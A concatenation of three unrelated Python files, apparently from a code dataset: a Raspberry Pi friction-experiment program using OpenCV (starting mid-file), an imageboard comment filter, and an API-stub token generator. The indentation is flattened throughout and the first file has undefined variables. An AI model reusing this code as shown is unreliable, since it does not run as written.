self.system.start_recording()
self.moving = True
else:
self.moving = False
# Arrange the screen
frame = self.arrange_screen(frame)
self.showFrame(frame)
self.isWindowShowEnabled = False
plt.close()
# Arrange the general screen
def arrange_screen(self, frame):
# General Screen
frame = cv2.rectangle(frame, (0, 490), (688, 528), (0, 0, 0), -1)
frame = cv2.rectangle(frame, (510, 0), (688, 30), (0, 0, 0), -1)
frame = cv2.putText(frame, "Angle:" + str(round(self.system.pot_angle, 1)), (10, 517), cv2.FONT_HERSHEY_SIMPLEX,
1, (0, 0, 200), 2, cv2.LINE_AA)
frame = cv2.putText(frame, "Distance:" + str(round(self.system.sonar, 2)), (520, 20), cv2.FONT_HERSHEY_SIMPLEX,
0.7, (0, 0, 200), 2, cv2.LINE_AA)
# Custom Screen Settings
if mode == "static":
frame = self.arrange_screen_static(frame)
elif mode == "kinetic":
frame = self.arrange_screen_kinetic(frame)
else:
raise Exception("Wrong mode selected. Please Specify the mode as either 'static' or 'kinetic'")
return frame
# Specialize arrange_screen for static friction calculations
def arrange_screen_static(self, frame):
if self.moving:
frame = cv2.putText(frame, "Moved!", (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 200), 2, cv2.LINE_AA)
self.coefficient_of_static_friction = round(math.tan(math.pi * self.system.pot_angle / 180.0), 2)
if self.motion_detected:
frame = cv2.putText(frame, "coefficient of static friction:" + str(self.coefficient_of_static_friction),
(300, 517), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 0, 200), 1, cv2.LINE_AA)
return frame
# Specialize arrange_screen for kinetic friction calculations
def arrange_screen_kinetic(self, frame):
if self.motion_detected:
frame = cv2.putText(frame, "Started Measuring!", (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 200), 2,
cv2.LINE_AA)
frame = cv2.putText(frame, "Press the button to stop measuring", (50, 100), cv2.FONT_HERSHEY_SIMPLEX, 1.0,
(0, 0, 200), 2, cv2.LINE_AA)
if self.moving:
self.system.set_motor_speed(0)
# End reading data
if self.system.button_state and len(self.system.recorded_data) > 10:
# Stop mechanism
self.system.set_motor_speed(0)
self.motion_detected = False
# Process the recorded data
data = self.system.end_recording_data()
x = list()
y = list()
for i in data:
x.append(i["time_stamp"])
y.append(i["distance"] / 100.0)
p = plotter()
position_v_time = [x, y]
position_v_time = p.trim_data(position_v_time)
p.plot("Position", position_v_time)
position_v_time_eq = p.plot_equation("Position", position_v_time)
velocity_v_time_eq = p.take_derivative(position_v_time_eq)
acceleration_v_time_eq = p.take_derivative(velocity_v_time_eq)
_ = p.plot_equation("Velocity", position_v_time, eq=velocity_v_time_eq)
_ = p.plot_equation("Acceleration", position_v_time, eq=acceleration_v_time_eq)
print("\n\n*********************")
print("Position vs. Time Graph's Equation is:")
print(position_v_time_eq)
print("\n*********************")
print("Velocity vs. Time Graph's Equation is:", velocity_v_time_eq)
print("*********************")
print("Acceleration vs. Time Graph's Equation is:", acceleration_v_time_eq, "\n", "*********************")
coefficient_of_static_friction = round(math.tan(math.pi * self.system.pot_angle / 180.0), 2) - float(acceleration_v_time_eq.c[0]) / (9.81 * round(math.cos(math.pi * self.system.pot_angle / 180.0), 2))
print("Therefore the coefficient of kinetic friction is:{}".format(coefficient_of_static_friction))
p.show()
return frame
# Multi-threaded window showing function
def showFrame(self, frameToShow, windowName="Frame"):
self.framesToShow[windowName] = frameToShow
if not self.isWindowShowEnabled:
self.isWindowShowEnabled = True
Thread(target=self.__updateWindowFrame__, args=()).start()
# Thread for updating the frame
def __updateWindowFrame__(self):
while self.isWindowShowEnabled:
for name in self.framesToShow.copy():
cv2.imshow(name, self.framesToShow[name])
self.key = cv2.waitKey(30)
if self.key == ord("s"):
initBB = cv2.selectROI("Frame", self.framesToShow["Frame"], fromCenter=False, showCrosshair=True)
self.tracker.init(self.framesToShow["Frame"], initBB)
self.isTracking = True
if self.key == ord('r'):
self.motion_detected = False
self.tracker = cv2.TrackerMOSSE_create()
self.isTracking = False
self.system.enabled_recording = False
self.system.recorded_data = list()
cv2.destroyAllWindows()
# Calculate the velocity(pixel/seconds) of the selected object
def get_speed(self, target_center):
elapsed = time.time() - self.initial_time
if self.initial_target_object_center is None:
self.initial_target_object_center = target_center
speed = 0
else:
displacement = ((target_center[0] - self.initial_target_object_center[0]) ** 2 +
(target_center[1] - self.initial_target_object_center[1]) ** 2) ** 0.5
speed = displacement / elapsed
self.initial_time = time.time()
self.initial_target_object_center = target_center
return speed
class plotter:
def __init__(self):
self.fig, (ax1, ax2, ax3) = plt.subplots(3, 1, figsize=(7, 8))
plt.subplots_adjust(top=0.95, bottom=0.05)
ax1.set_title("Position v. Time")
ax1.set_xlabel("Time(s)")
ax1.set_xlim(left=0.0)
ax1.set_ylabel("Position(m)")
ax1.set_ylim(bottom=0.0)
ax1.grid(True)
ax1.autoscale(True)
ax2.set_title("Velocity v. Time")
ax2.set_xlabel("Time(s)")
ax2.set_xlim(left=0.0)
ax2.set_ylabel("Velocity(m/s)")
ax2.set_ylim(bottom=0.0)
ax2.grid(True)
ax2.autoscale(True)
ax3.set_title("Acceleration v. Time")
ax3.set_xlabel("Time(s)")
ax3.set_xlim(left=0.0)
ax3.set_ylabel("Acceleration(m/s^2)")
ax3.set_ylim(bottom=0.0)
ax3.grid(True)
ax3.autoscale(True)
self.ax = {
"Position": ax1,
"Velocity": ax2,
"Acceleration": ax3
}
def take_derivative(self, eq):
# second degree polynomial
if len(eq.c) == 3:
new_eq = eq.deriv()
elif len(eq.c) == 2:
new_eq = eq.deriv()
else:
raise Exception("Your equation must be either of 1st or 2nd degree")
return new_eq
def trim_data(self, data):
x = data[0]
y = data[1]
new_x = list()
new_y = list()
for t in range(0, len(y)):
x[t] = x[t] - (x[0] + x[1] + x[2] + x[3] + x[4] + x[5] + x[6] + x[7] + x[8] + x[9])/10.0
y[t] = y[t] - (y[0] + y[1] + y[2] + y[3] + y[4] + y[5] + y[6] + y[7] + y[8] + y[9])/10.0
for t, pos in enumerate(y):
if pos < 0.35 and pos > 0.03:
new_x.append(x[t])
new_y.append(pos)
return [new_x, new_y]
def plot(self, graph_of, plot_data):
self.ax[graph_of].plot(plot_data[0], plot_data[1], **{"marker": "o"})
def plot_equation(self, graph_of, data_lists, eq=None):
x = data_lists[0]
y = data_lists[1]
t = np.linspace(0, x[-1] + 0.1, y[-1] + 10)
if graph_of == "Position":
p_pos = np.poly1d(np.polyfit(x, y, 2))
elif graph_of == "Velocity" or graph_of == "Acceleration":
p_pos = eq
else:
raise Exception("You can only plot Position, Velocity or Acceleration")
self.ax[graph_of].plot(x, y, 'o', t, p_pos(t), '-')
return p_pos
def show(self):
plt.show()
from RpiMotorLib import rpi_dc_lib
from RPi import GPIO
class InclinedSurface(Thread):
def __init__(self):
super().__init__()
self.motor = rpi_dc_lib.L298NMDc(19, 13, 26, 50)
self.pot_angle = 0.0
self.sonar = 0
self.button_state = False
self.is_running = True
self.recorded_data = list()
self.enabled_recording = False
self.percent = 0
def run(self):
import serial # Import Serial Library
arduinoSerialData = serial.Serial('/dev/ttyS0', 57600) # Create Serial port object called arduinoSerialData
while self.is_running:
try:
my_data = arduinoSerialData.readline()
str_my_data = str(my_data, encoding="utf-8").split("\r\n")[0]
list_my_data = str_my_data.split(",")
pot = int(list_my_data[0])
self.pot_angle = -0.257 * pot + 219.0
sonar = float(list_my_data[1])
self.sonar = sonar if sonar < 40 else self.sonar
self.button_state = int(list_my_data[2])
if self.enabled_recording:
measurement = {"angle": self.pot_angle,
"distance": self.sonar,
"time_stamp": time.time()}
self.recorded_data.append(measurement)
if self.percent > 0:
self.motor.backward(self.percent)
elif self.percent < 0:
self.motor.forward(-self.percent)
else:
self.motor.stop(0)
if not (-7 < self.pot_angle < 60):
self.percent = 0
except:
pass
def start_recording(self):
self.enabled_recording = True
def end_recording_data(self):
self.enabled_recording = False
initial_time = self.recorded_data[0]["time_stamp"]
for index in range(len(self.recorded_data)):
self.recorded_data[index]["time_stamp"] = self.recorded_data[index]["time_stamp"] - initial_time
return self.recorded_data
def set_motor_speed(self, percent):
self.percent = percent
def get_to_starting_point(self):
if self.pot_angle > 0:
while self.pot_angle > 0:
self.set_motor_speed(-50)
time.sleep(0.01)
else:
while self.pot_angle < 0:
self.set_motor_speed(50)
time.sleep(0.01)
self.set_motor_speed(0)
print("\n************\n")
print("The Mechanism has been set to its default position. Ready to set motor speed")
print("\n************\n")
system = InclinedSurface()
system.start()
vis = Vision(system)
vis.start()
system.get_to_starting_point()
while True:
try:
val = input("Set Motor:")
try:
if val == "default":
system.get_to_starting_point()
else:
system.set_motor_speed(int(val))
except:
print("\nOnly decimal numbers allowed!\n")
except KeyboardInterrupt:
print("\nexiting\n")
system.is_running = False
vis.is_running = False
system.set_motor_speed(0)
time.sleep(0.5)
exit()
|
<gh_stars>10-100
import re
def filter_data(comment):
lines = comment.split('\n')
line_filters = list(filter(
lambda name: name.startswith('skip_line_'),
[k for k, v in globals().items()]
))
for i in range(len(lines) - 1, -1, -1):
line = lines[i] + ''
line = line.strip(' ᅠᅠᅠ ')
line = cut_by_regex(line, '^((ре)?-?ролл)[.,] ')
line = cut_by_regex(line, '^((re)?-?roll)[.,] ')
line = cut_by_regex(line, '[.,] ((ре)?-?ролл)[.,]?$')
line = cut_by_regex(line, '[.,] ((re)?-?roll)[.,]?$')
line = cut_by_regex(line, '(: )?https?://[a-z0-9#?=%&@\-_.:/)!]+$')
line = cut_by_regex(line, 'https?://[a-zа-яё0-9#?=%&@\-_.:/()\[\]!,]+$')
line = cut_by_regex(line, 'https?://[a-zа-яё0-9#?=%&@\-_.:/()\[\]!,]+ ')
line = line.strip()
if line != lines[i]:
lines.pop(i)
lines.insert(i, line)
for lf in line_filters:
if globals()[lf](line.lower()):
lines.pop(i)
break
if len(line) == 0:
lines.pop(i)
return '\n'.join(lines)
def cut_by_regex(line, regex):
if re.search(regex, line, flags=re.U|re.I):
line = re.sub(regex, '', line, flags=re.U|re.I)
return line
def skip_line_short(line):
return len(line) > 0 and len(line) < 2
def skip_line_quote(line):
return line.startswith('>')
def skip_line_url(line):
return line.startswith('http://') or line.startswith('https://')
def skip_line_exclude(line):
words_to_exclude = [
'bump', 'bamp', 'бамп', 'бумп', 'бапм', 'побампа',
'ролл', 'роллллллл', 'roll', 'rollllll', 'реролл', 'reroll', 'roлл',
'rолл', 'ллор', 'llor', 'hjkk', 'кщдд', 'кручу-верчу', 'кручу', 'рiлл',
'рольчик', 'ролол', 'r0ll', 'rell', 'рольнём', 'рольнем', 'рролл',
'r o l l', 'р о л л', 'poll', 'ro11', 'ро11',
'test', 'тест',
'sage', 'сажа',
'source', 'соус', 'совас'
]
if line in words_to_exclude:
return True
for word in words_to_exclude:
contains = \
re.fullmatch(
'[^a-zа-яё0-9]*' + word + '.*?',
line, re.U
) \
or re.fullmatch(
'.*?' + word + '[^a-zа-яё0-9]*',
line, re.U
)
if contains and len(line) - len(word) <= 16:
return True
return False
def skip_line_nonmean(line):
for word in [
'сажа сажа сажа сажа',
'sage sage sage sage',
'[назад]',
'тематика [au',
'тематика [au',
'главная настройка mobile',
'доски каталог ст',
'[ b / vg / po / n',
'[ответить в тред]',
'image.',
'[жирный] [наклонный] [цитирование',
'кликни/брось файл/',
'покупка пасскода позволяет обходить капчу. ',
'перекот ',
'перекат треда ',
'xdddddddddd',
'11010000 10011011 11010000 10111110 11010000 10111011 100000 110',
'голова, дай денег',
'голова дай денег',
'голова, дай же мне денег',
'пирамида дай денег',
]:
if line.startswith(word):
return True
return False
|
<gh_stars>0
from json import JSONEncoder
import logging
import re
import importlib
import inspect
import platform
from ._node_index import NodeIndex
from ._token import Token
from ._token_kind import TokenKind
from ._version import VERSION
from ._diagnostic import Diagnostic
from ._metadata_map import MetadataMap
JSON_FIELDS = ["Name", "Version", "VersionString", "Navigation", "Tokens", "Diagnostics", "PackageName", "Language"]
HEADER_TEXT = "# Package is parsed using api-stub-generator(version:{0}), Python version: {1}".format(VERSION, platform.python_version())
TYPE_NAME_REGEX = re.compile("(~?[a-zA-Z\d._]+)")
TYPE_OR_SEPERATOR = " or "
# Lint warnings
SOURCE_LINK_NOT_AVAILABLE = "Source definition link is not available for [{0}]. Please check and ensure type is fully qualified name in docstring"
class ApiView:
"""Entity class that holds API view for all namespaces within a package
:param str pkg_name: The package name.
:param str namespace: The package namespace.
:param MetadataMap metadata_map: A metadata mapping object.
"""
def __init__(self, *, pkg_name="", namespace = "", metadata_map=None):
self.name = pkg_name
self.version = 0
self.version_string = ""
self.language = "Python"
self.tokens = []
self.navigation = []
self.diagnostics = []
self.indent = 0
self.namespace = namespace
self.node_index = NodeIndex()
self.package_name = pkg_name
self.metadata_map = metadata_map or MetadataMap("")
self.add_token(Token("", TokenKind.SkipDiffRangeStart))
self.add_literal(HEADER_TEXT)
self.add_token(Token("", TokenKind.SkipDiffRangeEnd))
self.set_blank_lines(2)
def add_token(self, token):
self.tokens.append(token)
def begin_group(self, group_name=""):
"""Begin a new group in API view by shifting to right
"""
self.indent += 1
def end_group(self):
"""End current group by moving indent to left
"""
if not self.indent:
raise ValueError("Invalid intendation")
self.indent -= 1
def add_whitespace(self):
if self.indent:
self.add_token(Token(" " * (self.indent * 4)))
def add_space(self):
self.add_token(Token(" ", TokenKind.Whitespace))
def add_newline(self):
""" Used to END a line and wrap to the next.
Cannot be used to inject blank lines.
"""
# don't add newline if it already is in place
if self.tokens[-1].kind != TokenKind.Newline:
self.add_token(Token("", TokenKind.Newline))
def set_blank_lines(self, count):
""" Ensures a specific number of blank lines.
Will add or remove newline tokens as needed
to ensure the exact number of blank lines.
"""
# count the number of trailing newlines
newline_count = 0
for token in self.tokens[::-1]:
if token.kind == TokenKind.Newline:
newline_count += 1
else:
break
if newline_count < (count + 1):
# if there are not enough newlines, add some
for n in range((count + 1) - newline_count):
self.add_token(Token("", TokenKind.Newline))
elif newline_count > (count + 1):
# if there are too many newlines, remove some
excess = newline_count - (count + 1)
for _ in range(excess):
self.tokens.pop()
def add_punctuation(self, value, prefix_space=False, postfix_space=False):
if prefix_space:
self.add_space()
self.add_token(Token(value, TokenKind.Punctuation))
if postfix_space:
self.add_space()
def add_line_marker(self, text):
token = Token("", TokenKind.LineIdMarker)
token.definition_id = text
self.add_token(token)
def add_text(self, id, text, add_cross_language_id=False):
token = Token(text, TokenKind.Text)
token.definition_id = id
if add_cross_language_id:
token.cross_language_definition_id = self.metadata_map.cross_language_map.get(id, None)
self.add_token(token)
def add_keyword(self, keyword, prefix_space=False, postfix_space=False):
if prefix_space:
self.add_space()
self.add_token(Token(keyword, TokenKind.Keyword))
if postfix_space:
self.add_space()
def add_type(self, type_name, line_id=None):
# This method replace full qualified internal types to short name and generate tokens
if not type_name:
return
type_name = type_name.replace(":class:", "")
logging.debug("Processing type {}".format(type_name))
# Check if multiple types are listed with 'or' seperator
# Encode multiple types with or separator into Union
if TYPE_OR_SEPERATOR in type_name:
types = [t.strip() for t in type_name.split(TYPE_OR_SEPERATOR) if t != TYPE_OR_SEPERATOR]
# Make a Union of types if multiple types are present
type_name = "Union[{}]".format(", ".join(types))
self._add_type_token(type_name, line_id)
def _add_token_for_type_name(self, type_name, line_id = None):
logging.debug("Generating tokens for type name {}".format(type_name))
token = Token(type_name, TokenKind.TypeName)
type_full_name = type_name[1:] if type_name.startswith("~") else type_name
token.value = type_full_name.split(".")[-1]
navigate_to_id = self.node_index.get_id(type_full_name)
if navigate_to_id:
token.navigate_to_id = navigate_to_id
elif type_name.startswith("~") and line_id:
# Check if type name is importable. If type name is incorrect in docstring then it wont be importable
# If type name is importable then it's a valid type name. Source link wont be available if type is from
# different package
if not is_valid_type_name(type_full_name):
# Navigation ID is missing for internal type, add diagnostic error
self.add_diagnostic(SOURCE_LINK_NOT_AVAILABLE.format(token.value), line_id)
self.add_token(token)
def _add_type_token(self, type_name, line_id = None):
# parse to get individual type name
logging.debug("Generating tokens for type {}".format(type_name))
types = re.search(TYPE_NAME_REGEX, type_name)
if types:
# Generate token for the prefix before internal type
# process internal type
# process post fix of internal type recursively to find replace more internal types
parsed_type = types.groups()[0]
index = type_name.find(parsed_type)
prefix = type_name[:index]
if prefix:
self.add_punctuation(prefix)
# process parsed type name. internal or built in
self._add_token_for_type_name(parsed_type)
postfix = type_name[index + len(parsed_type):]
# process remaining string in type recursively
self._add_type_token(postfix, line_id)
else:
# This is required group ending punctuations
self.add_punctuation(type_name)
def add_diagnostic(self, text, line_id):
self.diagnostics.append(Diagnostic(line_id, text))
def add_member(self, name, id):
token = Token(name, TokenKind.MemberName)
token.definition_id = id
self.add_token(token)
def add_stringliteral(self, value):
self.add_token(Token("\u0022{}\u0022".format(value), TokenKind.StringLiteral))
def add_literal(self, value):
self.add_token(Token(value, TokenKind.Literal))
def add_navigation(self, navigation):
self.navigation.append(navigation)
class APIViewEncoder(JSONEncoder):
"""Encoder to generate json for APIview object
"""
def _snake_to_pascal(self, text: str) -> str:
return text.replace("_", " ").title().replace(" ", "")
def _pascal_to_snake(self, text: str) -> str:
results = "_".join([x.lower() for x in re.findall('[A-Z][^A-Z]*', text)])
return results
def default(self, obj):
obj_dict = {}
if isinstance(obj, (ApiView, Token, Navigation, NavigationTag, Diagnostic)):
# Remove fields in APIview that are not required in json
if isinstance(obj, ApiView):
for key in JSON_FIELDS:
snake_key = self._pascal_to_snake(key)
if snake_key in obj.__dict__:
obj_dict[key] = obj.__dict__[snake_key]
elif isinstance(obj, Token):
obj_dict = {self._snake_to_pascal(k):v for k, v in obj.__dict__.items()}
# Remove properties from serialization to reduce size if property is not set
if not obj.definition_id:
del obj_dict["DefinitionId"]
if not obj.navigate_to_id:
del obj_dict["NavigateToId"]
if not obj.cross_language_definition_id:
del obj_dict["CrossLanguageDefinitionId"]
elif isinstance(obj, Diagnostic):
obj_dict = {self._snake_to_pascal(k):v for k, v in obj.__dict__.items()}
if not obj.help_link_uri:
del obj_dict["HelpLinkUri"]
else:
obj_dict = {self._snake_to_pascal(k):v for k, v in obj.__dict__.items()}
return obj_dict
elif isinstance(obj, TokenKind) or isinstance(obj, Kind):
return obj.value # {"__enum__": obj.value}
else:
try:
JSONEncoder.default(self, obj)
except:
logging.error("Failed to serialize using default serialization for {}. Serializing using object dict.".format(obj))
return obj_dict
class NavigationTag:
def __init__(self, kind):
self.type_kind = kind
class Kind:
type_class = "class"
type_enum = "enum"
type_method = "method"
type_module = "namespace"
type_package = "assembly"
class Navigation:
"""Navigation model to be added into tokens files. List of Navigation object represents the tree panel in tool"""
def __init__(self, text, nav_id):
self.text = text
self.navigation_id = nav_id
self.child_items = []
self.tags = None
def add_child(self, child):
self.child_items.append(child)
def is_valid_type_name(type_name):
try:
module_end_index = type_name.rfind(".")
if module_end_index > 0:
module_name = type_name[:module_end_index]
class_name = type_name[module_end_index+1:]
mod = importlib.import_module(module_name)
return class_name in [x[0] for x in inspect.getmembers(mod)]
except:
logging.error("Failed to import {}".format(type_name))
return False
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.